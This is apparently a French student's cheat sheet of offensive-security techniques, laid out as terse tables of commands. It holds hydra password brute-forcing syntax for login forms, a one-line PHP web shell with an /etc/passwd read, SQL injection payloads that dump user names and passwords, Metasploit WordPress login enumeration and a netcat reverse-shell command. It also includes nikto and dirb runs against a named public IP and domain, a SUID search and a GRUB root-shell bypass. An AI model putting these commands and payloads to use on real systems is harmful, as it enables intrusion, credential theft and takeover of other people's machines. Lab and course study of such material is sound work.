sécuritée
hydra
| | ||||
---|---|---|---|---|---|
-l | permet de définir le login ou le fichier de login | -l admin -l /file/nomlogin.txt | |||
-P | permet de définir le mot de passe ou le fichier de pass | -P password -P /file/password.txt | |||
protocoles | defini le protocole utilisée | http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) mysql5 oracle oracle-listener oracle-sid rexec rlogin smb smtp[s] ssh sshkey | |||
[-4|-6] | definir l'ipv4 ou l'ipv6 | -4 192.168.1.1 | |||
-s | specifie le port utilisee | -s 3333 | |||
exemple sans cookie | hydra -l user -P <chemin fichier password> [http-get-form|http-post-form] "</chemin/:username=^USER^&password=^PASS^&Login=Login:F=password incorrect>" | ||||
exemple avec cookie | hydra -l user -P <chemin fichier password> [http-get-form|http-post-form] "</chemin/:username=^USER^&password=^PASS^&Login=Login:F=password incorrect:H=Cookie: security=low; PHPSESSID=23lsdr0b8sh18fat8vdeur2uf4">" | ||||
-F | exit apres avoir trouvé un login/password ok | ||||
remote file inclusion
| | ||||
---|---|---|---|---|---|
Remote File Inclusion (RFI) est un type de vulnérabilité trouvé le plus souvent sur des sites web. Il permet à un attaquant d'inclure un fichier distant, généralement par le biais d'un script sur le serveur web. La vulnérabilité est due à l'utilisation de l'entrée fournie par l'utilisateur sans validation adéquate | |||||
file img.php : ################### <?php system($_GET['phoenix']); ?> | permet d'executer une commande sur le site cible | url?phoenix=id url?phoenix=cat%20../../../../etc/passwd | |||
injection SQL
| | ||||
---|---|---|---|---|---|
permet d'injecter dans un site une commande SQL | |||||
' '-- | inserer entre le debut de la demande et la fin (le serveur rajouteras une ' ) la commande souhaitée | ' OR '1'=1 | |||
recupere uand on connais les nom des tables | 'and '1'='0' union select null,concat(first_name,0x0a,last_name,user,0x3a,password) from users | ||||
connaitre la version mysql | 'and '1'='0' union select null, version()# | ||||
afficher les tables | 'AND 1=2 UNION SELECT CONCAT(table_schema,0x0a,table_name),null,null,null,null FROM information_schema.tables# | ||||
afficher les tables | 'AND 1=2 UNION SELECT CONCAT(COLUMN_NAME),null,null,null,null FROM INFORMATION_SCHEMA.COLUMNS# |
metalsploit
| | ||||
---|---|---|---|---|---|
searchsploit | permet de rechercher un exploit dans la base | searchsploit wordpress login | |||
msfconsole | permet de lancer la console metalsploit | ||||
search | permet de rechercher un exploit dans la msfconsole | search wordpress_login_enum | |||
show options | affiche la listes des options disponibles pour l'exploit | ||||
use <auxiliary/scanner/http/wordpress_login_enum > | utilise un exploit en particulier | va lancer un exploit en mode interactif | |||
wordpress_login_enum | set username | defini le username pour l'exploit | |||
set rhosts | defini le hoste à attaquer | ||||
set targeturi | defini l'url sur le serveur à attaquer | ||||
set pass_file | fichier dictionnaire de mot de passe | ||||
set stop_on_success | sarrete des que trouvee | ||||
exploit | run l'exploit avec les paramètres definis |
tp2 (a trier)
| | ||||
---|---|---|---|---|---|
nmap [ip] -sP | connaitre les hotes sur le réseau | ||||
nmap -An <ip;> | connaitre les port ouvert d'une machine | ||||
pdftotext | transforme un pdf en texte dans le paquet poppler | ||||
netstat -plants | affiches les connexions | ||||
binwalk -h | stegaographic tools | ||||
foremost | recuperer des fichiers caches | ||||
strings | affiche toutes les chaines de caractere d'un fichier | ||||
exrex | permet de génerer toutes les possibilite sur une chaine | ||||
zsteg | steganographie tools | exemple zsteg b1,rgb,lsb,y | |||
xxd | convertisseur hexadecimal | ||||
nikto -url 82.65.105.229 | permet de connaitre la version d'apache | ||||
dirb http://www.domotrix.fr | mapper un site | ||||
https://gtfobins.github.io/# | permet l'escalade de privilege | ||||
python -m SimpleHTTPServer | cree un serveur python petit | ||||
brainfuck | |||||
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/ | escalade de privilege | ||||
https://www.shodan.io/ | liste des version vulnerables | port:22 libssh country="FR" | |||
arp-scan -l | permet de voir les hotes du reseau | ||||
find / -perm -u=s -type f 2>/dev/null | permet de voir les fichier ou le sticky bit est positionnee | ||||
url?cmd=nc -lnvp 1234 | ouvre uneconnexion sur le port 1234 | ||||
nc -e /bin/bash <ip> <port> | ouvre une connection | ||||
pidof | connaitre le nom d'un processus | ||||
fg | foreground | ||||
bg | background | ||||
uname -a | avoir les information sur la version | ||||
python -c 'import pty;pty.spawn("/bin/bash")' | |||||
fcrackzip | craquer les mot de passes zip | ||||
#!/bin/bash
List=`nmap 192.168.1.1/24 -sP | sed 's/^Nmap scan report for \([0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\).*$/\1/' | grep "^[0-9]"`
echo $List
a=0;
for i in $List; do
echo $i
echo "------------------"
port=`nmap -An "$i" |grep "^[0-9]"`
echo $port
echo "------------------"
done
| |||||
Grub | en mode édition (e) changer ro en rw puis "init=/bin/bash" | cat /etc/passwd | cut -d: -f1,7 |grep "/bin" |